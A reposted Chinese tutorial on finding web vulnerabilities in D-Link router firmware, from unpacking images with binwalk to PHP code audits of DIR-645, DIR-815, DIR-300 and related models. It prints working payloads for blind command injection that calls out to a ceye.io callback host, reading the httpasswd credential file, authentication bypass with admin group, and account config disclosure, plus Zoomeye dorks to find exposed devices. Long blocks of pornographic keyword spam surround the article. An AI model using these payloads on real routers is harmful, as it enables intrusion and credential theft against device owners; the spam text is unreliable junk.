亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 網管 > 路由交換 > 正文

淺談D-Link系列路由器漏洞挖掘入門

2020-07-24 12:18:56
字體:
來源:轉載
供稿:網友

前幾天去上海參加了geekpwn,看著大神們一個個破解成功各種硬件,我只能在下面喊 6666,特別羨慕那些大神們。所以回來就決定好好研究一下路由器,爭取跟上大神們的步伐??淳W上公開的D-Link系列的漏洞也不少,那就從D-Link路由器漏洞開始學習。

 一、準備工作

既然要挖路由器漏洞,首先要搞到路由器的固件。 D-Link路由器固件下載地址:ftp://ftp2.dlink.com/PRODUCTS/下載完固件發現是個壓縮包,解壓之后里面還是有一個bin文件。聽說用binwalk就可以解壓。kali-linux自帶binwalk,但是缺少一些依賴,所以還是編譯安裝了一下。

$ sudo apt-get update  $ sudo apt-get install build-essential autoconf git      # https://github.com/devttys0/binwalk/blob/master/INSTALL.md   $ git clone https://github.com/devttys0/binwalk.git   $ cd binwalk      # python2.7安裝   $ sudo python setup.py install      # python2.7手動安裝依賴庫   $ sudo apt-get install python-lzma      $ sudo apt-get install python-crypto      $ sudo apt-get install libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip   $ sudo pip install pyqtgraph      $ sudo apt-get install python-pip   $ sudo pip install capstone      # Install standard extraction utilities(必選)   $ sudo apt-get install mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools      # Install sasquatch to extract non-standard SquashFS images(必選)   $ sudo apt-get install zlib1g-dev liblzma-dev liblzo2-dev   $ git clone https://github.com/devttys0/sasquatch   $ (cd sasquatch && ./build.sh)      # Install jefferson to extract JFFS2 file systems(可選)   $ sudo pip install cstruct   $ git clone https://github.com/sviehb/jefferson   $ (cd jefferson && sudo python setup.py install)      # Install ubi_reader to extract UBIFS file systems(可選)   $ sudo apt-get install liblzo2-dev python-lzo   $ git clone https://github.com/jrspruitt/ubi_reader   $ (cd ubi_reader && sudo python setup.py install)      # Install yaffshiv to extract YAFFS file systems(可選)   $ git clone https://github.com/devttys0/yaffshiv   $ (cd yaffshiv && sudo python setup.py install)      # Install unstuff (closed source) to extract StuffIt archive files(可選)   $ wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv  
 $ sudo cp bin/unstuff /usr/local/bin/

按照上面的命令就可以完整的安裝binwalk了,這樣就可以解開市面上的大部分固件包。 然后用 binwalk -Me 固件包名稱  解固件,然后我們會得到以下劃線開頭的名稱的文件夾,文件夾里 squashfs-root 文件夾,就是路由器的完整固件包。 漏 洞 挖 掘 此文章針對歷史路由器的web漏洞進行分析,路由器的web文件夾 一般就在 suashfs-root/www 或者  suashfs-root/htdocs 文件夾里。路由器固件所使用的語言一般為 asp,php,cgi,lua 等語言。這里主要進行php的代碼審計來挖掘漏洞。

二、D-Link DIR-645 & DIR-815 命令執行漏洞

Zoomeye dork:DIR-815 or DIR-645

這里以 D-Link DIR-645固件為例,解開固件進入 suashfs-root/htdocs 文件夾。這個漏洞出現在 diagnostic.php 文件。直接看代碼

  HTTP/1.1 200 OK            Content-Type: text/xml                        <?            if ($_POST["act"] == "ping")            {                set("/runtime/diagnostic/ping", $_POST["dst"]);                $result = "OK";            }            else if ($_POST["act"] == "pingreport")            {                $result = get("x", "/runtime/diagnostic/ping");            }            echo '<?xml version="1.0"?>/n';            ?><diagnostic>                <report><?=$result?></report>            </diagnostic>

分析代碼可以看到,這里沒有進行權限認證,所以可以直接繞過登錄。繼續往下看,set(“/runtime/diagnostic/ping”, $_POST["dst"]); 這段代碼就是造成漏洞的關鍵代碼。參數 dst 沒有任何過濾直接進入到了 ping的命令執行里,導致任意命令執行漏洞。繼續往下看 $result = “OK”; 無論是否執行成功,這里都會顯示OK。所以這是一個盲注的命令執行。以此構造payload

url = 'localhost/diagnostic.php' data = "act=ping&dst=%26 ping `whoami`.ceye.io%26"

因為是盲注的命令執行,所以這里需要借助一個盲打平臺(如:ceye),來驗證漏洞是否存在。

三、D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 信息泄露漏洞

Zoomeye dork:DIR-300 or DIR-600

這里以 D-Link DIR-300固件為例,解開固件進入 suashfs-root/www 文件夾。

漏洞出現在 /model/__show_info.php 文件。

<?if($REQUIRE_FILE == "var/etc/httpasswd" || $REQUIRE_FILE == "var/etc/hnapasswd"){echo "<title>404 Not Found</title>/n";echo "<h1>404 Not Found</h1>/n";}else{if($REQUIRE_FILE!=""){require($LOCALE_PATH."/".$REQUIRE_FILE);}else{echo $m_context;echo $m_context2;//jana addedif($m_context_next!=""){echo $m_context_next;}echo "<br><br><br>/n";if($USE_BUTTON=="1"){echo "<input type=button name='bt' value='".$m_button_dsc."' onclick='click_bt();'>/n"; }}} ?>

這里看到已經禁止了 $REQUIRE_FILE 的參數為 var/etc/httpasswd 和 var/etc/hnapasswd 。這么一看無法獲取賬號密碼。但是我們可以從根路徑開始配置  httpasswd 的路徑,就可以繞過這個過濾了。

payload:

localhost/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

這里設置 REQUIRE_FILE=/var/etc/httpasswd 成功繞過上面的 if 判斷,進行任意文件讀取。

四、D-Link DIR-300 & DIR-320 & DIR-615 權限繞過漏洞

Zoomeye dork:DIR-300 or DIR-615

這里以 D-Link DIR-300固件為例,解開固件進入 suashfs-root/www 文件夾

默認情況下,Web界面中的所有頁面都需要進行身份驗證,但是某些頁面(如 登錄頁面) 必須在認證之前訪問。 為了讓這些頁面不進行認證,他們設置了一個PHP變量NO_NEED_AUTH:

<?$MY_NAME ="login_fail";$MY_MSG_FILE=$MY_NAME.".php";$NO_NEED_AUTH="1";$NO_SESSION_TIMEOUT="1";require("/www/model/__html_head.php");?>

此漏洞觸發的原因在于 全局文件 _html_head.php 。

    <?    /* vi: set sw=4 ts=4: */    if ($NO_NEED_AUTH!="1")    {     /* for POP up login. */    // require("/www/auth/__authenticate_p.php");    // if ($AUTH_RESULT=="401") {exit;}     /* for WEB based login */     require("/www/auth/__authenticate_s.php");     if($AUTH_RESULT=="401") {require("/www/login.php"); exit;}     if($AUTH_RESULT=="full") {require("/www/session_full.php"); exit;}     if($AUTH_RESULT=="timeout") {require("/www/session_timeout.php"); exit;}     $AUTH_GROUP=fread("/var/proc/web/session:".$sid."/user/group");    }    require("/www/model/__lang_msg.php");    ?>

這里我們看到 $NO_NEED_AUTH!=”1″ 如果 $NO_NEED_AUTH 不為 1 則進入身份認證。如果我們把$NO_NEED_AUTH 值設置為 1 那就繞過了認證進行任意操作。

payload:

localhost/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0

這里 AUTH_GROUP=0 表示admin權限

 

五、D-Link DIR-645 信息泄露漏洞

Zoomeye dork:DIR-645

這里以 D-Link DIR-300固件為例,解開固件進入 suashfs-root/htdocs 文件夾

D-Link DIR-645 getcfg.php 文件由于過濾不嚴格導致信息泄露漏洞。

    $SERVICE_COUNT = cut_count($_POST["SERVICES"], ",");    TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]);    $SERVICE_INDEX = 0;    while ($SERVICE_INDEX < $SERVICE_COUNT)    {        $GETCFG_SVC = cut($_POST["SERVICES"], $SERVICE_INDEX, ",");        TRACE_debug("GETCFG: serivce[".$SERVICE_INDEX."] = ".$GETCFG_SVC);        if ($GETCFG_SVC!="")        {            $file = "/htdocs/webinc/getcfg/".$GETCFG_SVC.".xml.php";            /* GETCFG_SVC will be passed to the child process. */            if (isfile($file)=="1") dophp("load", $file);        }        $SERVICE_INDEX++;    }

這里我們可以看到 $GETCFG_SVC 沒有任何過濾直接獲取了 POST 傳遞過來的 SERVICES 的值。如果  $GETCFG_SVC 不為空,則進行文件讀取。這里我們就可以讀取存儲此設備信息的DEVICE.ACCOUNT.xml.php 文件。

payload:

http://localhost/getcfg.php

post:SERVICES=DEVICE.ACCOUNT

 

六、總結

可以發現此篇文章所提及的漏洞都是web領域的常見漏洞,如權限繞過,信息泄露,命令執行等漏洞。由于路由器的安全沒有得到足夠的重視,此文涉及到的漏洞都是因為對參數過濾不嚴格所導致的。

路由器的漏洞影響還是很廣泛的,在此提醒用戶,及時更新路由器固件,以此避免各種入侵事件,以及個人信息的泄露。

以上就是本文的全部內容,希望對大家的學習有所幫助,也希望大家多多支持武林網。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
亚洲福利小视频| 久久亚洲精品小早川怜子66| 亚洲男人第一av网站| 亚洲成色www8888| 欧美影院在线播放| 国产在线一区二区三区| 九九九久久久久久| 亚洲午夜精品久久久久久性色| 欧美成人国产va精品日本一级| 亚洲欧洲高清在线| 欧美综合一区第一页| 欧美午夜美女看片| 8090理伦午夜在线电影| 亚洲美腿欧美激情另类| 日韩欧美精品网站| 欧美日韩一区二区免费在线观看| 欧美久久精品一级黑人c片| 欧美伊久线香蕉线新在线| 日韩av资源在线播放| 国产精品视频99| 亚洲国产日韩欧美在线图片| 国产欧美精品一区二区| 久久久久久av| 538国产精品一区二区在线| 日韩国产欧美精品在线| 日韩欧美国产骚| 538国产精品视频一区二区| 国产视频在线一区二区| 亚洲一区美女视频在线观看免费| 亚洲成人动漫在线播放| 亚洲欧洲一区二区三区久久| 日本欧美一二三区| 在线播放日韩精品| 亚洲欧美日韩一区二区三区在线| 日本高清+成人网在线观看| 久久久久久久亚洲精品| 91探花福利精品国产自产在线| 色偷偷91综合久久噜噜| 日韩精品在线免费| 国产精品最新在线观看| 亚洲女人天堂色在线7777| 高清日韩电视剧大全免费播放在线观看| 亚洲精品wwwww| 日韩三级成人av网| 欧美亚洲国产日韩2020| 粉嫩av一区二区三区免费野| 欧美日韩一区二区三区在线免费观看| 国产va免费精品高清在线观看| 91精品国产高清久久久久久久久| 亚洲美女av在线| 成人伊人精品色xxxx视频| 欧美一区二区影院| 理论片在线不卡免费观看| 午夜精品一区二区三区在线播放| 亚洲国产欧美在线成人app| 奇米一区二区三区四区久久| 国产欧美欧洲在线观看| 久久精品亚洲国产| 91国自产精品中文字幕亚洲| 国产精品视频免费观看www| 中文字幕综合一区| 中文字幕日韩在线视频| 色偷偷偷综合中文字幕;dd| 日韩欧美精品中文字幕| 国产91免费观看| 亚洲综合在线中文字幕| 国产精品va在线| 欧美国产精品日韩| 在线日韩av观看| 国产精品免费电影| 欧美极品少妇xxxxⅹ喷水| 久久久伊人欧美| 日韩av电影手机在线观看| 97视频在线观看免费| 成人精品视频99在线观看免费| 中文字幕国产精品久久| 国产91亚洲精品| 国产精品嫩草视频| 国产亚洲福利一区| 欧美亚洲激情在线| 一本色道久久88亚洲综合88| 欧美精品成人91久久久久久久| 国产亚洲激情视频在线| 亚洲精品美女在线观看| 日本精品视频在线播放| 亚洲精品自产拍| 亚洲网站在线观看| 中国人与牲禽动交精品| 国产精品久久久久久亚洲调教| 青青草精品毛片| 57pao成人永久免费视频| 国产精品www网站| 秋霞午夜一区二区| 国产午夜精品免费一区二区三区| 欧美激情二区三区| 欧美成人自拍视频| 久久久精品一区二区三区| 欧美性受xxxx黑人猛交| 欧美性20hd另类| 久久精品亚洲一区| 欧美成人黄色小视频| 国产精品一区二区三区免费视频| 亚洲**2019国产| 中文字幕亚洲综合久久筱田步美| 少妇高潮 亚洲精品| 久久免费高清视频| 国产精品久久久久国产a级| 久久久久久久国产| 成人在线免费观看视视频| 国产精品一区二区av影院萌芽| 97免费视频在线播放| 久久影院模特热| 欧美精品激情在线观看| 精品久久久久久久大神国产| 一区二区亚洲欧洲国产日韩| 欧美视频在线观看 亚洲欧| 国产精品久久久久久久久影视| 中文字幕av一区二区| 大胆欧美人体视频| 国产成人小视频在线观看| 久久久久久成人精品| 日本精品va在线观看| 亚洲国产成人av在线| 国产视频精品xxxx| 国产日韩在线一区| 亚洲综合中文字幕68页| 国产精品高潮呻吟久久av黑人| 国产精品草莓在线免费观看| 久久免费视频在线观看| 欧美在线免费看| 91久久国产婷婷一区二区| 97精品一区二区视频在线观看| 91久久夜色精品国产网站| 另类美女黄大片| 性欧美xxxx交| 81精品国产乱码久久久久久| 日本精品视频网站| 亚洲欧美精品中文字幕在线| 国产亚洲精品久久久久久牛牛| 欧美大片在线影院| 欧美一级淫片aaaaaaa视频| 日本一区二区三区四区视频| 欧美大片免费观看| 日韩免费观看网站| 欧美日韩久久久久| 欧美激情视频一区二区三区不卡| 日韩欧美一区视频| 日本不卡免费高清视频| 国产福利视频一区| 中文字幕精品影院| 97视频在线观看成人| 国产丝袜一区二区| 日韩中文字幕亚洲| 亚洲春色另类小说| 国产日韩在线看片| 国产精品啪视频| 国产精品69久久久久| 国产精品一区二区三区毛片淫片| 欧美专区在线观看| 成人免费淫片aa视频免费| 国产免费久久av| 亚洲jizzjizz日本少妇| 亚洲激情视频在线播放| 国产日韩欧美日韩|